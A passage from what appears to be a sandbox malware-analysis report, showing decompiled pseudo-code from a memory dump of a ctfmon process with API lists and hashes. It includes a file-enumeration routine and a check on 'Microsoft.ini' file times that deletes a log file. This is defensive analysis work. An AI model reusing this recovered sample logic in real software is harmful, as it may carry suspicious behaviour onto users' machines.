				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E009778D0(_t85, _t78, 1);
					_t87 = _t110;
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0098071B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0097BC12(_a16, __eflags, _t111);
							E00977848(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0098071B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00975C3D();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x98f008; // 0x35554c2f
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00980770(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00973440(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0097B9D3(_t79, _t93, _t106,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E009802D0(_t79, _t106, _t103 + _t96 * 4, _t65 - _t96, 4, E0097B82B);
									}
								} else {
									_push(_t55);
									_t57 = E0097B9D3(_t79, _t90, _t106, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0097B9D3(_t79, _t88, 0, _t79, 0, 0);
								}
							}
							_pop(_t114);
							__eflags = _v12 ^ _t118;
							return E00970A5D(_v12 ^ _t118, _t114);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}


















































                                                0x0097b9d8
                                                0x0097b9d9
                                                0x0097b9dc
                                                0x0097b9dc
                                                0x0097b9df
                                                0x0097b9df
                                                0x0097b9e1
                                                0x0097b9e2
                                                0x0097b9eb
                                                0x0097b9ec
                                                0x0097b9ef
                                                0x0097b9f2
                                                0x0097b9f7
                                                0x0097b9fe
                                                0x0097ba00
                                                0x0097ba03
                                                0x0097ba0d
                                                0x0097ba10
                                                0x0097ba11
                                                0x0097ba13
                                                0x0097ba27
                                                0x0097ba27
                                                0x0097ba2a
                                                0x0097ba34
                                                0x0097ba39
                                                0x0097ba3c
                                                0x0097ba3e
                                                0x00000000
                                                0x0097ba40
                                                0x0097ba44
                                                0x0097ba4d
                                                0x0097ba53
                                                0x00000000
                                                0x0097ba56
                                                0x0097ba15
                                                0x0097ba15
                                                0x0097ba1b
                                                0x0097ba20
                                                0x0097ba23
                                                0x0097ba25
                                                0x0097ba5c
                                                0x0097ba5e
                                                0x0097ba5f
                                                0x0097ba60
                                                0x0097ba61
                                                0x0097ba62
                                                0x0097ba63
                                                0x0097ba68
                                                0x0097ba6c
                                                0x0097ba6e
                                                0x0097ba74
                                                0x0097ba7b
                                                0x0097ba7e
                                                0x0097ba81
                                                0x0097ba82
                                                0x0097ba85
                                                0x0097ba86
                                                0x0097ba89
                                                0x0097ba8a
                                                0x0097baab
                                                0x0097baab
                                                0x0097baad
                                                0x00000000
                                                0x00000000
                                                0x0097ba92
                                                0x0097ba94
                                                0x0097ba96
                                                0x0097ba98
                                                0x0097ba9a
                                                0x0097ba9c
                                                0x0097ba9e
                                                0x0097baa9
                                                0x00000000
                                                0x0097baa9
                                                0x0097ba9e
                                                0x0097ba9a
                                                0x00000000
                                                0x0097ba96
                                                0x0097baaf
                                                0x0097bab1
                                                0x0097bab4
                                                0x0097bacd
                                                0x0097bacd
                                                0x0097bacf
                                                0x0097bad2
                                                0x0097bae2
                                                0x0097bae4
                                                0x0097bae4
                                                0x0097bad4
                                                0x0097bad4
                                                0x0097bad7
                                                0x00000000
                                                0x0097bad9
                                                0x0097bad9
                                                0x0097badc
                                                0x00000000
                                                0x0097bade
                                                0x0097bade
                                                0x0097bade
                                                0x0097badc
                                                0x0097bad7
                                                0x0097baea
                                                0x0097baf2
                                                0x0097baf6
                                                0x0097bb04
                                                0x0097bb09
                                                0x0097bb1e
                                                0x0097bb20
                                                0x0097bb26
                                                0x0097bb29
                                                0x0097bb5b
                                                0x0097bb5b
                                                0x0097bb5d
                                                0x0097bb60
                                                0x0097bb66
                                                0x0097bb66
                                                0x0097bb6d
                                                0x0097bb87
                                                0x0097bb87
                                                0x0097bb96
                                                0x0097bb9b
                                                0x0097bb9e
                                                0x0097bba0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097bb6f
                                                0x0097bb6f
                                                0x0097bb75
                                                0x0097bb77
                                                0x00000000
                                                0x0097bb79
                                                0x0097bb79
                                                0x0097bb7c
                                                0x00000000
                                                0x0097bb7e
                                                0x0097bb7e
                                                0x0097bb85
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097bb85
                                                0x0097bb7c
                                                0x0097bb77
                                                0x00000000
                                                0x0097bba2
                                                0x0097bbaa
                                                0x0097bbb0
                                                0x0097bbb2
                                                0x0097bbb2
                                                0x0097bbba
                                                0x0097bbbf
                                                0x0097bbc7
                                                0x0097bbca
                                                0x0097bbcc
                                                0x0097bbe0
                                                0x0097bbe5
                                                0x0097bb2b
                                                0x0097bb2b
                                                0x0097bb2f
                                                0x0097bb37
                                                0x0097bb37
                                                0x0097bb37
                                                0x0097bb39
                                                0x0097bb3c
                                                0x0097bb3f
                                                0x0097bb3f
                                                0x0097bab6
                                                0x0097bab9
                                                0x0097babb
                                                0x00000000
                                                0x0097babd
                                                0x0097babd
                                                0x0097bac3
                                                0x0097bac8
                                                0x0097babb
                                                0x0097bb4b
                                                0x0097bb4c
                                                0x0097bb57
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097ba25
                                                0x0097b9f9
                                                0x0097b9fb
                                                0x0097ba57
                                                0x0097ba5b
                                                0x0097ba5b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .$/LU5/
                                                • API String ID: 0-1863816827
                                                • Opcode ID: ca3511ff78ab8bf408942ff30d3859ec4698ae80c4c6618e2c9d6190a1071bf9
                                                • Instruction ID: 00c54e86717d3491ff97d44c63cf79f253ce58363aff2c20ed066cdd64bd2209
                                                • Opcode Fuzzy Hash: ca3511ff78ab8bf408942ff30d3859ec4698ae80c4c6618e2c9d6190a1071bf9
                                                • Instruction Fuzzy Hash: C03104729002496FCB289E78CC85FFA7BBDEF85314F1481A8F95CD7251E6309E448B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096A3B0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 190filetimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0096A3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				short _v532;
				short _v1052;
				struct _FILETIME _v1060;
				struct _FILETIME _v1068;
				struct _FILETIME _v1076;
				struct _FILETIME _v1084;
				struct _FILETIME _v1092;
				struct _FILETIME _v1100;
				void* __esi;
				signed int _t38;
				void* _t50;
				int _t61;
				void* _t69;
				void* _t72;
				signed int _t83;
				signed int _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t103;

				_t95 = __edi;
				_t94 = __edx;
				_t38 =  *0x98f008; // 0x35554c2f
				_v8 = _t38 ^ _t103;
				_t99 = __ecx;
				E00973440(__edi,  &_v532, 0, 0x208);
				_t100 = wsprintfW;
				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
				E00973440(_t95,  &_v1052, 0, 0x208);
				wsprintfW( &_v1052, L"%ws.log",  &_v532);
				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
				if(_t50 == 0xffffffff) {
					L14:
					__eflags = _v8 ^ _t103;
					return E00970A5D(_v8 ^ _t103, _t100);
				} else {
					_t101 = CloseHandle;
					CloseHandle(_t50);
					_v1092.dwLowDateTime = 0;
					_v1092.dwHighDateTime = 0;
					_v1100.dwLowDateTime = 0;
					_v1100.dwHighDateTime = 0;
					_v1060.dwLowDateTime = 0;
					_v1060.dwHighDateTime = 0;
					_v1068.dwLowDateTime = 0;
					_v1068.dwHighDateTime = 0;
					_v1076.dwLowDateTime = 0;
					_v1076.dwHighDateTime = 0;
					_v1084.dwLowDateTime = 0;
					_v1084.dwHighDateTime = 0;
					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
					if(_t96 == 0xffffffff) {
						L13:
						__eflags = _v8 ^ _t103;
						return E00970A5D(_v8 ^ _t103, _t101);
					} else {
						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
						_push(_t96);
						if(_t61 != 0) {
							CloseHandle();
							DeleteFileW( &_v1052);
							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
							__eflags = _t97 - 0xffffffff;
							if(_t97 != 0xffffffff) {
								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
								CloseHandle(_t97);
							}
							asm("sbb eax, [ebp-0x424]");
							_t98 = E00984470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
							_t83 = _t94;
							asm("sbb ecx, [ebp-0x434]");
							_t69 = E00984470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
							__eflags = _t83 - _t94;
							if(__eflags < 0) {
								L9:
								_t69 = _t98;
								_t94 = _t83;
							} else {
								if(__eflags <= 0) {
									__eflags = _t98 - _t69;
									if(_t98 <= _t69) {
										goto L9;
									}
								}
							}
							_t72 = E00984470(E00984470(E00984470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
							__eflags = _t94;
							if(__eflags < 0) {
								goto L13;
							} else {
								if(__eflags > 0) {
									goto L14;
								} else {
									__eflags = _t72 - 0x48;
									if(_t72 > 0x48) {
										goto L14;
									} else {
										goto L13;
									}
								}
							}
						} else {
							CloseHandle();
							return E00970A5D(_v8 ^ _t103, CloseHandle);
						}
					}
				}
			}


























                                                0x0096a3b0
                                                0x0096a3b0
                                                0x0096a3b9
                                                0x0096a3c0
                                                0x0096a3d1
                                                0x0096a3d6
                                                0x0096a3ea
                                                0x0096a3f6
                                                0x0096a406
                                                0x0096a421
                                                0x0096a442
                                                0x0096a447
                                                0x0096a61a
                                                0x0096a621
                                                0x0096a62c
                                                0x0096a44d
                                                0x0096a44d
                                                0x0096a454
                                                0x0096a46e
                                                0x0096a479
                                                0x0096a483
                                                0x0096a48d
                                                0x0096a497
                                                0x0096a4a1
                                                0x0096a4ab
                                                0x0096a4b5
                                                0x0096a4bf
                                                0x0096a4c9
                                                0x0096a4d3
                                                0x0096a4dd
                                                0x0096a4e9
                                                0x0096a4ee
                                                0x0096a607
                                                0x0096a60f
                                                0x0096a619
                                                0x0096a4f4
                                                0x0096a50a
                                                0x0096a510
                                                0x0096a513
                                                0x0096a52a
                                                0x0096a533
                                                0x0096a554
                                                0x0096a556
                                                0x0096a559
                                                0x0096a571
                                                0x0096a578
                                                0x0096a578
                                                0x0096a58c
                                                0x0096a5a6
                                                0x0096a5a8
                                                0x0096a5ae
                                                0x0096a5b6
                                                0x0096a5c5
                                                0x0096a5ca
                                                0x0096a5cc
                                                0x0096a5d4
                                                0x0096a5d4
                                                0x0096a5d6
                                                0x0096a5ce
                                                0x0096a5ce
                                                0x0096a5d0
                                                0x0096a5d2
                                                0x00000000
                                                0x00000000
                                                0x0096a5d2
                                                0x0096a5ce
                                                0x0096a5f7
                                                0x0096a5fc
                                                0x0096a5fe
                                                0x00000000
                                                0x0096a600
                                                0x0096a600
                                                0x00000000
                                                0x0096a602
                                                0x0096a602
                                                0x0096a605
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096a605
                                                0x0096a600
                                                0x0096a515
                                                0x0096a515
                                                0x0096a529
                                                0x0096a529
                                                0x0096a513
                                                0x0096a4ee

                                                APIs
                                                • wsprintfW.USER32 ref: 0096A3F6
                                                • wsprintfW.USER32 ref: 0096A421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096A442
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0096A4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A50A
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A515
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A52A
                                                • DeleteFileW.KERNEL32(?), ref: 0096A533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0096A552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A571
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$/LU5/$Microsoft.ini
                                                • API String ID: 3158408392-2106214503
                                                • Opcode ID: 2e38780b6d21cc262ff9f1a8eda2bab4b73b267121bbb9f7328b5ac13e68f5a7
                                                • Instruction ID: dd254ca6c80efafbc03176912b8192157b6da0d9ed9be558c977998c16ee02d0
                                                • Opcode Fuzzy Hash: 2e38780b6d21cc262ff9f1a8eda2bab4b73b267121bbb9f7328b5ac13e68f5a7
                                                • Instruction Fuzzy Hash: 9A5187B1A4021CAADB20DB64CC85FDE77BCAB44714F5401D9F709B71C1DAB06E898F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097221C Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E0097221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v5;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v72;
				intOrPtr* _v80;
				signed int _v100;
				signed int* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t190;
				signed int* _t198;
				intOrPtr* _t199;
				signed int _t202;
				signed int _t206;
				intOrPtr* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t221;
				void* _t225;
				signed int _t227;
				void* _t231;
				void* _t233;
				char _t234;
				signed int* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				char _t257;
				signed int _t263;
				char* _t267;
				intOrPtr _t273;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				char _t283;
				intOrPtr _t285;
				signed int _t287;
				signed int* _t289;
				intOrPtr* _t290;
				signed int* _t292;
				signed int _t294;
				intOrPtr _t300;
				intOrPtr* _t304;
				signed int _t305;
				void* _t306;
				signed int* _t310;
				void* _t313;
				void* _t314;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t282 = __edx;
				_t264 = __ecx;
				_t253 = _a8;
				_push(_t304);
				_t289 = _a20;
				_v44 = 0;
				_v5 = 0;
				if(_t289[1] > 0x80) {
					_t190 =  *((intOrPtr*)(_t253 + 8));
				} else {
					_t190 =  *((char*)(_t253 + 8));
				}
				_v12 = _t190;
				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
					L62:
					E0097753C(_t253, _t264, _t289, _t304, __eflags);
					goto L63;
				} else {
					_t304 = _a4;
					if( *_t304 != 0xe06d7363) {
						_t264 = _a12;
						goto L57;
					} else {
						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
							L23:
							_t264 = _a12;
							_v16 = _t264;
							goto L25;
						} else {
							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
								goto L23;
							} else {
								_t225 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t328);
								_t329 =  *((intOrPtr*)(_t225 + 0x10));
								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
									L61:
									return _t225;
								} else {
									_t304 =  *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
									_t246 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t329);
									_v44 = 1;
									_v16 =  *((intOrPtr*)(_t246 + 0x14));
									if(_t304 == 0) {
										goto L62;
									} else {
										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
											L19:
											_t248 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t336);
											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
												L24:
												_t264 = _v16;
												_t190 = _v12;
												L25:
												__eflags =  *_t304 - 0xe06d7363;
												if( *_t304 != 0xe06d7363) {
													L57:
													__eflags = _t289[3];
													if(__eflags <= 0) {
														goto L60;
													} else {
														__eflags = _a24;
														if(__eflags != 0) {
															goto L62;
														} else {
															_push(_a32);
															_push(_a28);
															_push(_t190);
															_push(_t289);
															_push(_a16);
															_push(_t264);
															_push(_t253);
															_push(_t304);
															L66();
															_t316 = _t316 + 0x20;
															goto L60;
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
															L30:
															__eflags = _t289[3];
															if(_t289[3] > 0) {
																_t264 =  &_v28;
																_t233 = E00973879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
																_t282 = _v28;
																_t316 = _t316 + 0x14;
																__eflags = _t282 - _v48;
																if(_t282 < _v48) {
																	_t47 = _t233 + 0x10; // 0x10
																	_t278 = _t47;
																	_t234 = _v12;
																	_v36 = _t278;
																	do {
																		_t50 = _t278 - 0x10; // 0x0
																		_v60 = _t50;
																		_t289 = _a20;
																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
																				_v24 =  *_t278;
																				_t263 =  *(_t278 - 4);
																				__eflags = _t263;
																				_v32 = _t263;
																				_t253 = _a8;
																				if(_t263 > 0) {
																					_t279 = _v24;
																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
																					_t287 =  *_t236;
																					_t237 =  &(_t236[1]);
																					__eflags = _t237;
																					_v52 = _t237;
																					_t238 = _v32;
																					_v56 = _t287;
																					while(1) {
																						_v20 = _v52;
																						_t289 = _a20;
																						_v40 = _t287;
																						__eflags = _t287;
																						if(_t287 <= 0) {
																							goto L41;
																						} else {
																							goto L38;
																						}
																						while(1) {
																							L38:
																							_t240 = E00972B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
																							_t316 = _t316 + 0xc;
																							__eflags = _t240;
																							if(_t240 != 0) {
																								break;
																							}
																							_v20 = _v20 + 4;
																							_t244 = _v40 - 1;
																							_t279 = _v24;
																							_v40 = _t244;
																							__eflags = _t244;
																							if(_t244 > 0) {
																								continue;
																							} else {
																								_t238 = _v32;
																								goto L41;
																							}
																							L44:
																							_t282 = _v28;
																							_t278 = _v36;
																							_t234 = _v12;
																							goto L45;
																						}
																						_push(_v44);
																						_v5 = 1;
																						E00972157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
																						_t316 = _t316 + 0x2c;
																						goto L44;
																						L41:
																						_t238 = _t238 - 1;
																						_t279 = _t279 + 0x10;
																						_v32 = _t238;
																						_v24 = _t279;
																						__eflags = _t238;
																						if(_t238 > 0) {
																							_t287 = _v56;
																							_v20 = _v52;
																							_t289 = _a20;
																							_v40 = _t287;
																							__eflags = _t287;
																							if(_t287 <= 0) {
																								goto L41;
																							} else {
																								goto L38;
																							}
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																		L45:
																		_t282 = _t282 + 1;
																		_t278 = _t278 + 0x14;
																		_v28 = _t282;
																		_v36 = _t278;
																		__eflags = _t282 - _v48;
																	} while (_t282 < _v48);
																}
															}
															__eflags = _a24;
															if(__eflags != 0) {
																_push(1);
																E00971E94(__eflags);
																_t264 = _t304;
															}
															__eflags = _v5;
															if(__eflags != 0) {
																L60:
																_t225 = E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																__eflags =  *(_t225 + 0x1c);
																if(__eflags != 0) {
																	goto L62;
																} else {
																	goto L61;
																}
															} else {
																_t227 =  *_t289 & 0x1fffffff;
																__eflags = _t227 - 0x19930521;
																if(__eflags < 0) {
																	goto L60;
																} else {
																	__eflags = _t289[7];
																	if(_t289[7] != 0) {
																		L52:
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags != 0) {
																			goto L62;
																		} else {
																			_push(_t289[7]);
																			L86();
																			_t264 = _t304;
																			__eflags = _t227;
																			if(__eflags != 0) {
																				goto L60;
																			} else {
																				E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				 *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
																				_t231 = E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				__eflags = _a32;
																				_t267 = _v16;
																				_push(_t304);
																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
																				if(_a32 != 0) {
																					goto L64;
																				} else {
																					_push(_t253);
																				}
																				goto L65;
																			}
																		}
																	} else {
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags == 0) {
																			goto L60;
																		} else {
																			goto L52;
																		}
																	}
																}
															}
														} else {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
																goto L30;
															} else {
																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
																	goto L57;
																} else {
																	goto L30;
																}
															}
														}
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
												_t251 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t337);
												_push(_v36);
												_push(_t304);
												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
												L86();
												if(_t251 != 0) {
													goto L24;
												} else {
													_push(_v36);
													L99();
													_pop(_t264);
													_t339 = _t251;
													if(_t251 == 0) {
														goto L62;
													} else {
													}
													L63:
													_push(1);
													_push(_t304);
													E00971E94(_t339);
													_t267 =  &_v72;
													E00971F49(_t267);
													E009733CD( &_v72, 0x98de1c);
													L64:
													_push(_a32);
													L65:
													E00973923(_t267);
													_push(_a16);
													_push(_t253);
													E009729A5(_t253, _t267, _t282, _t289, _t339);
													_t317 = _t316 + 0x10;
													_push(_t289[7]);
													_t198 = E0097211D(_t253, _t267, _t282, _t289, _t304, _t339);
													asm("int3");
													_t313 = _t317;
													_push(_t267);
													_push(_t267);
													_push(_t289);
													_t290 = _v80;
													_t340 =  *_t290 - 0x80000003;
													if( *_t290 == 0x80000003) {
														L84:
														return _t198;
													} else {
														_push(_t253);
														_t199 = E0097360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
														_t254 = _a16;
														_t341 =  *((intOrPtr*)(_t199 + 8));
														if( *((intOrPtr*)(_t199 + 8)) == 0) {
															L72:
															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
																E0097753C(_t254, _t267, _t290, _t304, __eflags);
																asm("int3");
																_push(_t313);
																_t314 = _t317;
																_t318 = _t317 - 0x18;
																_push(_t254);
																_push(_t304);
																_t305 = _v100;
																_push(_t290);
																__eflags = _t305;
																if(__eflags == 0) {
																	E0097753C(_t254, _t267, _t290, _t305, __eflags);
																	asm("int3");
																	_push(_t314);
																	_push(_t254);
																	_push(_t305);
																	_push(_t290);
																	_t292 = _v144;
																	_t306 = 0;
																	__eflags =  *_t292;
																	if( *_t292 <= 0) {
																		L103:
																		_t202 = 0;
																		__eflags = 0;
																	} else {
																		_t256 = 0;
																		while(1) {
																			_t206 = E0097359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x995d4c);
																			__eflags = _t206;
																			if(_t206 == 0) {
																				break;
																			}
																			_t306 = _t306 + 1;
																			_t256 = _t256 + 0x10;
																			__eflags = _t306 -  *_t292;
																			if(_t306 <  *_t292) {
																				continue;
																			} else {
																				goto L103;
																			}
																			goto L104;
																		}
																		_t202 = 1;
																	}
																	L104:
																	return _t202;
																} else {
																	_t294 =  *_t305;
																	_t257 = 0;
																	__eflags = _t294;
																	if(_t294 > 0) {
																		_t283 = 0;
